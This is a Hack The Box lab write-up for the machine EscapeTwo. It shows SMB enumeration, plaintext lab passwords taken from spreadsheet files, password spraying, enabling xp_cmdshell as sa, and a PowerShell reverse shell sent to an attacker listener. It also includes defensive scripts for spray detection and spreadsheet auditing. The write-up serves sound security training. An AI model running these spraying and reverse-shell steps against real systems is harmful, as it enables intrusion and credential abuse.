Hack The Box Write-Up EscapeTwo - 10.10.11.51

About EscapeTwo

In this post, I’m writing a write-up for the machine EscapeTwo from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

EscapeTwo is an ‘Easy’-rated box. Submitting the user.txt flag raises your points by 10, and submitting the root flag raises them by 20.

As is common in real-life Windows pentests, we start this box with credentials for the following account:

Username  Password
rose      KxEPkKe6R8su

Foothold

We start this machine with the credentials of the user account rose, so we already have a foothold. This user has permission to access the SMB share Accounting Department, which holds two corrupted Excel files, accounting_2024.xlsx and accounts.xlsx. After changing their extensions to .zip and extracting them, we find more usernames and passwords. After a password spraying attack, we can move laterally from rose to sa and establish a more persistent connection to this machine.

User

With the user account sa we can connect to MSSQL and enable xp_cmdshell, which lets us establish a reverse shell to our attacker machine. In the reverse shell we are running as the user account sql_svc. The file C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI contains the password for this account. With net user we also find two new users, ryan and ca_svc. After another password spraying attack we confirm ryan’s password, get a shell with evil-winrm, and read user.txt.

Root

Using Bloodhound, we discovered that the user account ryan has full control over the ca_svc user account. We can also confirm that this machine is not only a Domain Controller and Database Server but also a Certificate Authority, which is not a recommended configuration. With this permission, we took control of the ca_svc user account, changed its password, and checked for any vulnerable certificate templates using certipy. We found that the template DunderMifflinAuthentication is vulnerable because the ca_svc user account has full control over it, making this server susceptible to the so-called ESC4 attack. Through the ESC4 attack, we requested a domain admin certificate, and with the hash of this user account, we can perform a pass-the-hash attack using evil-winrm to gain root access to this machine.

Machine Info

Machine Name: EscapeTwo
Difficulty: Easy
Points: 20
Release Date: 11 Jan 2025
IP: 10.10.11.51
Creator: ruycr4ft & Llo0zy

Reconnaissance

Portscan with Nmap

As always, we start this machine with a portscan with Nmap.

sudo nmap -sC -sV -oA ./nmap/escapetwo escapetwo.htb

The results.

# Nmap 7.94SVN scan initiated Sat May 17 15:50:32 2025 as: nmap -sC -sV -oA ./nmap/escapetwo.htb escapetwo.htb                                                        
Nmap scan report for escapetwo.htb (10.10.11.51)                                                                                                                      
Host is up (0.029s latency).                                                                                                                                          
Not shown: 988 filtered tcp ports (no-response)                                                                                                                       
PORT     STATE SERVICE       VERSION                                                                                                                                  
53/tcp   open  domain        Simple DNS Plus                                                                                                                          
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-17 13:52:19Z)                                                                           
135/tcp  open  msrpc         Microsoft Windows RPC                                                                                                                    
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                            
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)                                            
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.                                                                                                      
| ssl-cert: Subject: commonName=DC01.sequel.htb                                                                                                                       
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb                                                                       
| Not valid before: 2024-06-08T17:35:00                                                                                                                               
|_Not valid after:  2025-06-08T17:35:00                                                                                                                               
445/tcp  open  microsoft-ds?                                                                                                                                          
464/tcp  open  kpasswd5?                                                                                                                                              
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                      
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)                                            
| ssl-cert: Subject: commonName=DC01.sequel.htb                                                                                                                       
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb                                                                       
| Not valid before: 2024-06-08T17:35:00                                                                                                                               
|_Not valid after:  2025-06-08T17:35:00                                                                                                                               
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.                                                                                                      
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM                                                                                             
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback                                                                                                              
| Not valid before: 2025-05-17T10:23:29                                                                                                                               
|_Not valid after:  2055-05-17T10:23:29                                                                                                                               
| ms-sql-ntlm-info:                                                                                                                                                   
|   10.10.11.51:1433:                                                                                                                                                 
|     Target_Name: SEQUEL                                                                                                                                             
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-17T13:53:38+00:00; +1m35s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after:  2025-06-08T17:35:00
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m34s, deviation: 0s, median: 1m34s
|   date: 2025-05-17T13:53:01
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May 17 15:52:04 2025 -- 1 IP address (1 host up) scanned in 91.95 seconds

The Nmap scan reveals that this server is a Domain Controller with the hostname DC01.sequel.htb. Along with the default Domain Controller ports, port 1433/tcp (Microsoft SQL Server) is open. Running SQL Server on a Domain Controller is not a recommended configuration: the database, its service account and any command execution it offers all live on the most sensitive host in the domain. This configuration will be interesting for owning the machine. First, we add the hostname dc01.sequel.htb to our hosts file and point it to the machine’s IP address.

Enumeration

SMB

As we have user credentials, let’s start by enumerating the SMB protocol on port 445/tcp.

[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #smbmap -H dc01.sequel.htb -u rose -p 'KxEPkKe6R8su'
[+] IP: dc01.sequel.htb:445     Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        Accounting Department                                   READ ONLY
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        Users                                                   READ ONLY

We have several shared directories we can access. The Accounting Department share is the most promising one, and we will examine it further. The Users and SYSVOL shares are also interesting: the latter can reveal logon scripts containing credentials, or give us more information about the enforced domain policies.

Let’s start enumerating the Accounting Department share by connecting to it with the credentials from the user account rose.

sudo smbclient //dc01.sequel.htb/'Accounting Department' -U 'sequel/rose'
Password for [SEQUEL\rose]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun  9 12:52:21 2024
  ..                                  D        0  Sun Jun  9 12:52:21 2024
  accounting_2024.xlsx                A    10217  Sun Jun  9 12:14:49 2024
  accounts.xlsx                       A     6780  Sun Jun  9 12:52:07 2024

                6367231 blocks of size 4096. 927332 blocks available
smb: \>

This share holds two files, accounting_2024.xlsx and accounts.xlsx. We download them to our attacking machine.

smb: \> mget *
Get file accounting_2024.xlsx? y
getting file \accounting_2024.xlsx of size 10217 as accounting_2024.xlsx (63,1 KiloBytes/sec) (average 63,1 KiloBytes/sec)
Get file accounts.xlsx? y
getting file \accounts.xlsx of size 6780 as accounts.xlsx (34,3 KiloBytes/sec) (average 47,3 KiloBytes/sec)

We check the Users share.

[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ # sudo smbclient //dc01.sequel.htb/Users -U 'sequel/rose'                                                                                                         
Password for [SEQUEL\rose]:                                                                                                                                           
Try "help" to get a list of possible commands.                                                                                                                        
smb: \> ls                                                                                                                                                            
  .                                  DR        0  Sun Jun  9 15:42:11 2024                                                                                            
  ..                                 DR        0  Sun Jun  9 15:42:11 2024                                                                                            
  Default                           DHR        0  Sun Jun  9 13:17:29 2024                                                                                            
  desktop.ini                       AHS      174  Sat Sep 15 09:16:48 2018                                                                                            
                                                                                                                                                                      
                6367231 blocks of size 4096. 927299 blocks available                                                                                                  
smb: \>

We have the directory Default. Its contents are applied to every newly created user profile. I quickly checked the contents of this directory and found nothing useful at this moment, but we keep this folder in mind, as it can be useful later.

Let’s examine the downloaded xlsx files. First, I tried to open them with Microsoft Excel and LibreOffice Calc, but I saw only gibberish data. It seems that these files are corrupted.

[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ # file accounting_2024.xlsx 
accounting_2024.xlsx: Zip archive data, made by v4.5, extract using at least v2.0, last modified, last modified Sun, Jan 01 1980 00:00:00, uncompressed size 1284, method=deflate
[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ # file accounts.xlsx
accounts.xlsx: Zip archive data, made by v2.0, extract using at least v2.0, last modified, last modified Sun, Jun 09 2024 10:47:44, uncompressed size 681, method=deflate

The file command identifies both files as ZIP archives (an .xlsx is a ZIP container of XML parts, so this is expected even for an intact workbook). Therefore, we can rename them from .xlsx to .zip, extract the archives, and examine the extracted directories and files.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #sudo mv accounting_2024.xlsx accounting_2024.zip && sudo mv accounts.xlsx accounts.zip
┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #sudo unzip accounts.zip
Archive:  accounts.zip
file #1:  bad zipfile offset (local header sig):  0
  inflating: xl/workbook.xml         
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/sharedStrings.xml    
  inflating: _rels/.rels             
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: docProps/custom.xml     
  inflating: [Content_Types].xml

After the extraction, we have the following folder structure:

  • docProps: metadata about the workbook. It typically contains two files: core.xml (title, author, subject, and creation/modification dates) and app.xml (application-specific properties).
  • xl: the main content of the workbook, such as worksheets, shared strings and styling.
  • _rels: relationship files that define how the different parts of the document relate to each other.

For us, the xl directory is interesting. This directory holds the actual file contents in XML format.

We can find additional usernames in the file xl/worksheets/sheet1.xml, where the email column is stored as hyperlinks.

    <hyperlinks>
        <hyperlink ref="C2" r:id="rId1" display="[email protected]" />
        <hyperlink ref="C3" r:id="rId2" display="[email protected]" />
        <hyperlink ref="C4" r:id="rId3" display="[email protected]" />
        <hyperlink ref="C5" r:id="rId4" display="[email protected]" />
    </hyperlinks>

We already know that the Microsoft SQL port 1433/tcp is open, and we have now confirmed that the user account [email protected] exists. We can now unzip accounting_2024.zip.

Discovering additional credentials

We can search the extracted files for passwords with grep. We search recursively for the following words:

  1. Password
  2. password
  3. credentials

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo/accounts]
└──╼ #grep -lre 'Password' -e 'password' -e 'credentials'
xl/sharedStrings.xml

It seems that the file xl/sharedStrings.xml contains these words, so let’s read that file.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo/accounts/xl]
└──╼ #cat sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="25" uniqueCount="24">
    <si>
        <t xml:space="preserve">First Name</t>
    </si>
    <si>
        <t xml:space="preserve">Last Name</t>
    </si>
    <si>
        <t xml:space="preserve">Email</t>
    </si>
    <si>
        <t xml:space="preserve">Username</t>
    </si>
    <si>
        <t xml:space="preserve">Password</t>
    </si>
    <si>
        <t xml:space="preserve">Angela</t>
    </si>
    <si>
        <t xml:space="preserve">Martin</t>
    </si>
    <si>
        <t xml:space="preserve">[email protected]</t>
    </si>
    <si>
        <t xml:space="preserve">angela</t>
    </si>
    <si>
        <t xml:space="preserve">0fwz7Q4mSpurIt99</t>
    </si>
    <si>
        <t xml:space="preserve">Oscar</t>
    </si>
    <si>
        <t xml:space="preserve">Martinez</t>
    </si>
    <si>
        <t xml:space="preserve">[email protected]</t>
    </si>
    <si>
        <t xml:space="preserve">oscar</t>
    </si>
    <si>
        <t xml:space="preserve">86LxLBMgEWaKUnBG</t>
    </si>
    <si>
        <t xml:space="preserve">Kevin</t>
    </si>
    <si>
        <t xml:space="preserve">Malone</t>
    </si>
    <si>
        <t xml:space="preserve">[email protected]</t>
    </si>
    <si>
        <t xml:space="preserve">kevin</t>
    </si>
    <si>
        <t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
    </si>
    <si>
        <t xml:space="preserve">NULL</t>
    </si>
    <si>
        <t xml:space="preserve">[email protected]</t>
    </si>
    <si>
        <t xml:space="preserve">sa</t>
    </si>
    <si>
        <t xml:space="preserve">MSSQLP@ssw0rd!</t>
    </si>
</sst>

We found the following usernames and passwords. Note that angela’s password starts with a zero (0fwz7Q4mSpurIt99), which is easy to drop when copying it out of the XML:

Username  Password
angela    0fwz7Q4mSpurIt99
oscar     86LxLBMgEWaKUnBG
kevin     Md9Wlq1E5bZnVDVo
sa        MSSQLP@ssw0rd!

Nice! We now have additional passwords.
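To see what the manual unzip-and-read above is really doing, here is an added example (not code from the write-up) that reads a workbook as the ZIP of XML parts it is. Cells marked t="s" in xl/worksheets/sheet1.xml are indices into xl/sharedStrings.xml, which is why the usernames and passwords turned up in that file. The sample workbook, the alice account and the example-pw-1 value are constructed for the example; the script resolves the shared strings back into rows and flags any column whose header looks like a credential field, which is also a cheap way to audit a file share for spreadsheets that should not contain passwords.

```python
"""Read an .xlsx as the ZIP-of-XML container it is (added example).

Cells with t="s" store an index into xl/sharedStrings.xml; everything else
carries its value inline. Resolving the indices gives the sheet back as rows.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

MAIN_NS = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS = {"m": MAIN_NS}

# Constructed sample workbook parts; the account and password are invented.
SHARED_STRINGS_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<sst xmlns="{MAIN_NS}" count="6" uniqueCount="6">'
    "<si><t>Username</t></si><si><t>Password</t></si><si><t>Email</t></si>"
    "<si><t>alice</t></si><si><t>example-pw-1</t></si>"
    "<si><t>alice@example.test</t></si>"
    "</sst>"
)
SHEET1_XML = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    f'<worksheet xmlns="{MAIN_NS}"><sheetData>'
    '<row r="1"><c r="A1" t="s"><v>0</v></c><c r="B1" t="s"><v>1</v></c>'
    '<c r="C1" t="s"><v>2</v></c></row>'
    '<row r="2"><c r="A2" t="s"><v>3</v></c><c r="B2" t="s"><v>4</v></c>'
    '<c r="C2" t="s"><v>5</v></c></row>'
    '<row r="3"><c r="A3"><v>42</v></c></row>'  # numeric cell, no t="s"
    "</sheetData></worksheet>"
)


def build_sample_xlsx() -> bytes:
    """Zip the two constructed parts into a minimal workbook, in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("xl/sharedStrings.xml", SHARED_STRINGS_XML)
        zf.writestr("xl/worksheets/sheet1.xml", SHEET1_XML)
    return buf.getvalue()


def load_shared_strings(zf: zipfile.ZipFile) -> list:
    """Return the shared-string table in index order (one entry per <si>)."""
    root = ET.fromstring(zf.read("xl/sharedStrings.xml"))
    table = []
    for si in root.findall("m:si", NS):
        # rich-text entries split the text over several <t>; join them
        table.append("".join(t.text or "" for t in si.iter(f"{{{MAIN_NS}}}t")))
    return table


def read_rows(xlsx_bytes: bytes) -> list:
    """Resolve sheet1 into a list of rows (lists of cell strings)."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        strings = load_shared_strings(zf)
        root = ET.fromstring(zf.read("xl/worksheets/sheet1.xml"))
        rows = []
        for row in root.find("m:sheetData", NS).findall("m:row", NS):
            cells = []
            for cell in row.findall("m:c", NS):
                value = cell.find("m:v", NS)
                if value is None:
                    cells.append("")
                elif cell.get("t") == "s":          # shared-string reference
                    cells.append(strings[int(value.text)])
                else:                               # inline number/bool
                    cells.append(value.text)
            rows.append(cells)
        return rows


def find_credential_columns(rows: list, keywords=("password", "credential")) -> dict:
    """Map every header that looks like a secret field to its non-empty values."""
    if not rows:
        return {}
    hits = {}
    for idx, header in enumerate(rows[0]):
        if any(k in header.lower() for k in keywords):
            hits[header] = [r[idx] for r in rows[1:] if idx < len(r) and r[idx]]
    return hits


if __name__ == "__main__":
    sheet = read_rows(build_sample_xlsx())
    for r in sheet:
        print(r)
    print("credential columns:", find_credential_columns(sheet))
```

Python’s zipfile is stricter than unzip: on archives like the ones from this share, where unzip only warned about a bad local header offset, ZipFile may raise BadZipFile, so repair the file first (for example with zip -FF) before parsing it.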

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #sudo unzip accounting_2024.zip 
Archive:  accounting_2024.zip
file #1:  bad zipfile offset (local header sig):  0
  inflating: _rels/.rels             
  inflating: xl/workbook.xml         
  inflating: xl/_rels/workbook.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/sharedStrings.xml    
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/printerSettings/printerSettings1.bin  
  inflating: docProps/core.xml       
  inflating: docProps/app.xml

I checked the files, but I didn’t find anything useful. I have placed all the found usernames in the file users.txt and the passwords in passwords.txt. We can now perform a password spraying attack to determine which usernames and passwords are working and, if successful, identify the services to which the user accounts have access.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]                                                                                                                  
└──╼ #nxc smb 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success                                                                                         
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)         
SMB         10.10.11.51     445    DC01             [-] sequel.htb\angela:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE                                                        
SMB         10.10.11.51     445    DC01             [-] sequel.htb\oscar:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE                                                         
SMB         10.10.11.51     445    DC01             [-] sequel.htb\kevin:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE                                                         
SMB         10.10.11.51     445    DC01             [-] sequel.htb\sa:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE                                                            
SMB         10.10.11.51     445    DC01             [-] sequel.htb\rose:fwz7Q4mSpurIt99 STATUS_LOGON_FAILURE                                                                                                                 
SMB         10.10.11.51     445    DC01             [-] sequel.htb\angela:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE                                                       
SMB         10.10.11.51     445    DC01             [+] sequel.htb\oscar:86LxLBMgEWaKUnBG                                                                             
SMB         10.10.11.51     445    DC01             [-] sequel.htb\kevin:86LxLBMgEWaKUnBG STATUS_LOGON_FAILURE                                                        
...
SMB         10.10.11.51     445    DC01             [-] sequel.htb\angela:KxEPkKe6R8su STATUS_LOGON_FAILURE 
SMB         10.10.11.51     445    DC01             [-] sequel.htb\kevin:KxEPkKe6R8su STATUS_LOGON_FAILURE 
SMB         10.10.11.51     445    DC01             [-] sequel.htb\sa:KxEPkKe6R8su STATUS_LOGON_FAILURE 
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su

We have confirmed that the password for the user account oscar is correct and that this user account has access to the file shares. I checked the file shares with this user account, but Oscar does not have any additional permissions beyond what we already had through Rose. Let’s check MSSQL in the same manner.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]                                                                                                                  
└──╼ #nxc mssql 10.10.11.51 -u users.txt -p passwords.txt --continue-on-success --local-auth                                                                          
MSSQL       10.10.11.51     1433   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)                                          
MSSQL       10.10.11.51     1433   DC01             [-] DC01\angela:fwz7Q4mSpurIt99 (Login failed for user 'angela'. Please try again with or without '--local-auth') 
MSSQL       10.10.11.51     1433   DC01             [-] DC01\oscar:fwz7Q4mSpurIt99 (Login failed for user 'oscar'. Please try again with or without '--local-auth')   
MSSQL       10.10.11.51     1433   DC01             [-] DC01\kevin:fwz7Q4mSpurIt99 (Login failed for user 'kevin'. Please try again with or without '--local-auth')   
MSSQL       10.10.11.51     1433   DC01             [-] DC01\sa:fwz7Q4mSpurIt99 (Login failed for user 'sa'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\rose:fwz7Q4mSpurIt99 (Login failed for user 'rose'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\angela:86LxLBMgEWaKUnBG (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\oscar:86LxLBMgEWaKUnBG (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\kevin:86LxLBMgEWaKUnBG (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\sa:86LxLBMgEWaKUnBG (Login failed for user 'sa'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\rose:86LxLBMgEWaKUnBG (Login failed for user 'rose'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\angela:Md9Wlq1E5bZnVDVo (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\oscar:Md9Wlq1E5bZnVDVo (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\kevin:Md9Wlq1E5bZnVDVo (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\sa:Md9Wlq1E5bZnVDVo (Login failed for user 'sa'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\rose:Md9Wlq1E5bZnVDVo (Login failed for user 'rose'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\angela:MSSQLP@ssw0rd! (Login failed for user 'angela'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\oscar:MSSQLP@ssw0rd! (Login failed for user 'oscar'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [-] DC01\kevin:MSSQLP@ssw0rd! (Login failed for user 'kevin'. Please try again with or without '--local-auth')
MSSQL       10.10.11.51     1433   DC01             [+] DC01\sa:MSSQLP@ssw0rd! (Pwn3d!)

We have confirmed that the password for the sa user is working for the MSSQL service.
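Seen from the other side, the sprays above are bursts of 18456 login failures in SQL Server’s ERRORLOG (and 4625 events on the Domain Controller). As an added example that is not part of the write-up, the following script parses a constructed ERRORLOG excerpt (real line format, invented timestamps and client addresses) and raises an alert when one client fails logins for several distinct accounts inside a short window, which is the spray signature: many accounts, one source, few attempts each. The window length and the account threshold are assumptions to tune for your environment.

```python
"""Spot a password spray in SQL Server's ERRORLOG (added example).

A spray touches many accounts from one source in a short time, so the signal
is "many distinct failed user names per client within a window", not the
repeated failures for a single account that lockout policies already catch.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed excerpt in the layout of real 18456 entries. The "Error: 18456"
# lines carry no user or client and are skipped by the parser.
SAMPLE_ERRORLOG = "\n".join([
    "2025-05-17 13:55:01.23 Logon       Error: 18456, Severity: 14, State: 8.",
    "2025-05-17 13:55:01.23 Logon       Login failed for user 'angela'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    "2025-05-17 13:55:01.41 Logon       Login failed for user 'oscar'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    "2025-05-17 13:55:01.60 Logon       Login failed for user 'kevin'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    "2025-05-17 13:55:01.78 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.5]",
    "2025-05-17 13:55:01.95 Logon       Error: 18456, Severity: 14, State: 5.",
    "2025-05-17 13:55:01.95 Logon       Login failed for user 'rose'. Reason: Could not find a login matching the name provided. [CLIENT: 10.0.0.5]",
    "2025-05-17 14:10:44.02 Logon       Login failed for user 'sa'. Reason: Password did not match that for the login provided. [CLIENT: 10.0.0.9]",
])

FAILED_LOGIN_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) +Logon +"
    r"Login failed for user '(?P<user>[^']*)'.*\[CLIENT: (?P<client>[^\]]+)\]"
)


def parse_failed_logins(text: str):
    """Yield (timestamp, user, client) for every 'Login failed' line."""
    for line in text.splitlines():
        m = FAILED_LOGIN_RE.match(line)
        if m:
            ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
            yield ts, m.group("user"), m.group("client")


def detect_spray(events, window=timedelta(minutes=5), min_users=4) -> list:
    """One alert per client that fails >= min_users distinct logins inside
    any sliding window of the given length (thresholds are assumptions)."""
    by_client = defaultdict(list)
    for ts, user, client in events:
        by_client[client].append((ts, user))

    alerts = []
    for client, evs in sorted(by_client.items()):
        evs.sort()
        start = 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:   # slide the window
                start += 1
            users = {u for _, u in evs[start:end + 1]}
            if len(users) >= min_users:
                # extend to every later failure still inside the same window
                stop = end
                while stop + 1 < len(evs) and evs[stop + 1][0] - evs[start][0] <= window:
                    stop += 1
                alerts.append({
                    "client": client,
                    "first": evs[start][0],
                    "last": evs[stop][0],
                    "users": sorted(u for _, u in evs[start:stop + 1]),
                })
                break
    return alerts


if __name__ == "__main__":
    for a in detect_spray(parse_failed_logins(SAMPLE_ERRORLOG)):
        print(f"{a['client']}: {len(a['users'])} accounts between "
              f"{a['first']} and {a['last']}: {a['users']}")
```

The single sa failure from 10.0.0.9 is left alone: one account, one attempt, is what a mistyped password looks like, and alerting on it would only drown the real signal.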

Lateral Movement

From rose to sa

MSSQL has an extended stored procedure called xp_cmdshell, which allows us to execute operating-system commands from SQL. It is disabled by default, and enabling it requires a sysadmin login such as sa.

Let’s connect to the MSSQL server on port 1433/tcp as the sa user. Calling xp_cmdshell directly shows that this feature is not yet enabled. After enabling it (mssqlclient’s enable_xp_cmdshell helper runs the same sp_configure and RECONFIGURE statements shown below), we can execute the command whoami.

┌─[✗]─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #impacket-mssqlclient 'sequel.htb/sa:MSSQLP@[email protected]'
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> xp_cmdshell
[-] ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (sa  dbo@master)> EXECUTE sp_configure 'show advanced options', 1
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> RECONFIGURE
SQL (sa  dbo@master)> EXECUTE sp_configure 'xp_cmdshell', 1
[*] INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> RECONFIGURE
SQL (sa  dbo@master)> EXEC xp_cmdshell 'whoami'
output           
--------------   
sequel\sql_svc   

NULL

Let’s establish a reverse shell to our attacker machine.

SQL (sa  dbo@master)> EXEC xp_cmdshell 'powershell -e <base64-encoded reverse shell payload omitted>'

Reverse shell is up and running, we are connected with the user account sql_svc.

┌─[root@parrot]─[/home/johnd/htb/machines/escapetwo]
└──╼ #nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.76] from (UNKNOWN) [10.10.11.51] 61036

PS C:\Windows\system32> hostname; whoami
DC01
sequel\sql_svc
PS C:\Windows\system32>

In the directory C:\SQL2019\ExpressAdv_ENU we found a file named sql-Configuration.INI. Reading this file reveals the password for the user account sql_svc.

PS C:\SQL2019\ExpressAdv_ENU> cat sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
